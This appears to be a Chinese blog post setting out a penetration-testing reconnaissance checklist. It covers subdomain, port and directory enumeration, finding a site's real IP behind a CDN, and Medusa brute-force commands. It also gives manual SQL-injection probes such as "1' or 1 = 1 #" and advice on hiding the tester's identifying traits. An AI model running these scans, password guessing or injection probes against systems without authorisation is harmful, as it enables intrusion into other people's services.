信息收集

前言

信息收集是渗透测试的前期工作，目的在于扩大目标的攻击面，为后续有针对性的测试做铺垫。笔者认为，信息收集=流程+工具，有了完整的流程加上趁手的工具，信息收集就可以实现自动化（无脑化），故整理了一套方法论，供读者参考。

以下内容摘自笔记，语言为英语，是因为实际工作中，我们必须时刻注意保护自己，尽可能减少特征（当然下面的笔记中有很明显的中国特征，是个错误示范）。比如工作设备不能被恶意的物理接触（e.g. u盘）、操作系统的时区、语言、敏感文件的存储、特定虚拟机只做特定的事、网络环境等等，这些内容由于与本 blog 不相关故不展开。

流程

前提：假定已知某个目标域名

• whois

• fuzzing top domain name

  • host="xxx" in fofa

  • search which domain has been taken in godaddy

• use tool to search specific target

  • fofa clue search

  • whois(whoxy, sqlsec.com)

    • similar domains

    • whois history

  • github.com: in:xxx

  • virustotal

  • CMS fingerprint

  • censys

  • netlas.io

  • beian.miit.gov.cn

  • error log

• find real ip

  • favicon hash

  • DNS record

  • ssl certificate

  • pingning from many places

  • search specific body

  • ctrl + u → related code → directory travel(try to change ip when acces denied)

  • nslookup

• scan related network address(e.g., 1.1.1.1 - 1.1.1.10)

  • don't miss website can't be access(state code: 3xx ~ 4xx)

• find all subdomain

• scan port && directory(special / rarely seen port or directory may match with specific exploitation)

  • duplicate

  • attack according to type

  • wanna dynamic file & admin interface, nor static file(check source code)

    • audit code and search "admin, login, ajax"

    • chrome developer tool

• discover bug & exp

  • login interface without verification, try brute force

工具

Register:

ip check:

• virustotal

• favicon hash, body

• dns record
• ssl certificate: search.censys.io

• engine: O.zone

passwd guess:

• online: Medusa, Hyrda

  • medusa -h <ip_address> - admin -p admin -M 10443

• offline: Hashcat

  You cannot use hashcat to recover online accounts (like Gmail, Instagram, Facebook, Twitter, etc.), because hashcat has no way to work on online accounts.

port scan(/24 all are results):

• masscan, blackwater(comprehensive use, adjust parameter)

  Copy

  blackwater -i x.x.x.x -c 400 -р 1-65535
  ​
  masscan -p1-65535 x.x.x.x/24 --exclude x.x.x.x-x.x.x.x --rate 800 > <result>

• Nmap(recognize fingerprint): nmap -A <ip_address> -o ‹output_filename>

• rustscan:

  Copy

  alias rustscan='docker run -it --rm --name rustscan rustscan/rustscan: 2.1. 1'
  rustscan -a 127.0.0.1 -q --range 1-10000

bug scan: Nessus, Core Impact, Netsparker

Register:

structure: Metasploit

directory(self-built websites && special path):

• dirmap:

  Copy

  python3 dirmap.py -iF targets.txt -1cf
  python3 dirmap.py -i <url> -lcf

• dirsearch:

  Copy

  python dirsearch.py -e php -u <url> --exclude-status 403,401 --deep-recursive -o <output_filename>

• dirb: dirb <url> -0 <result>

subdomain:

• oneforall(directory, parameter): python3 oneforall.py --target <domain> --exclude www run --output <output_filename>

• knockpy: knockpy -d <domain> --recon --bruteforce --save report

• google: site: xxxxxx -www

• fofa: domain="xxxxxx"

search: fofa syntax

traffic listening: burp suite

picture: exiftool

version recognize: hash value && * match

sql injection:

• manually

  • Determine whether there is injection and whether the injection is character or numeric(difference: quotation marks && number of sql)

    • trick: 1' or 1 = 1 #, 1 or 1 = 1 # → retum messge?

    • sleep

    • Guess the number of fields in the SQL query statement

    • Determine the order of displayed fields

  • Get target

    • current database

    • table

    • field names in the table

• sqlmap

• Defense

  • POD: user input is bound to the statement, separating it from the SQL query

  • Make sure only 1 result is returned

  • Anti-CSRF token